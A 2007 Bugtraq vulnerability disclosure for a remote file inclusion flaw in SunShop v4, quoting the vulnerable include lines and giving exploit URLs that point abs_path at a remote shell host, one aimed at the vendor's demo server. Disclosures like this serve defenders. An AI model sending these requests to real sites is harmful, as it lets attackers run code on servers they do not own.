Bugtraq mailing list archives
sunshop v4 >> RFI
From: info () hackerz ir
Date: 25 Apr 2007 15:38:16 -0000
vendor : turnkeywebtools.com by : s3rv3r_hack3r ( alijsb () yahoo com ) bugz: ++++++++++++++++++++ include/payment/payflow_pro.php > include $abs_path."/include/payment/payflow_pro/pfpro.class.php"; ++++++++++++++++++++ global.php require_once $abs_path."/libsecure.php"; ++++++++++++++++++++ libsecure.php include $abs_path . '/admin/config.php'; ++++++++++++++++++++ EXploit : file.php?abs_path=http://shell for example : http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?
Current thread:
- sunshop v4 >> RFI info (Apr 25)